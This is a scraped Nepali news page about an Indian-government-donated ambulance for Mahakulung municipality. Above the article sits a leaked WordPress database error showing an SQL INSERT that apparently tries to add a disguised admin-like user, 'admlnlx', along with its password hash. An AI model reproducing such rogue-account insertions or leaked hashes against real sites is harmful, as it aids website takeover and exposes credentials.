WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BicsAJwvcKKsEvWUvlnfmTS50.Vf3b1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 04:45:41', '', 'admlnlx', 'admlnlx')

महाकुलुङलाई भारत सरकारको अनुदानमा एम्बुलेन्स – Gaule Khabar

महाकुलुङलाई भारत सरकारको अनुदानमा एम्बुलेन्स

महाकुलुङलाई भारत सरकारको अनुदानमा एम्बुलेन्स

काठमाण्डौ । महाकुलुङ गाउँपालिकाले भारत सरकारको अनुदानमा एम्बुलेन्स प्राप्त गरेको छ । भारत सरकारको अनुदान सहायता अन्तर्गत ७५ वटा एम्बुलेन्स र १७ वटा विद्यालय बस उपहारस्वरुप प्रदान गर्दा महाकुलुङले पनि एउटा एम्बुलेन्स प्राप्त गरेको हो ।

आइतबार भारतीय दूतावासमा आयोजित एक कार्यक्रममा पालिका अध्यक्ष सुर्य बहादुर कुलुङले एम्बुलेन्स बुझेपछि अध्यक्ष कुलुङले दीगोपनाको सोचसहित कार्यविधि बनाएर न्यूनतम शुल्कमा महाकुलुङका नागरिकलाई सेवा प्रवाह गर्ने बताए ।

 

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका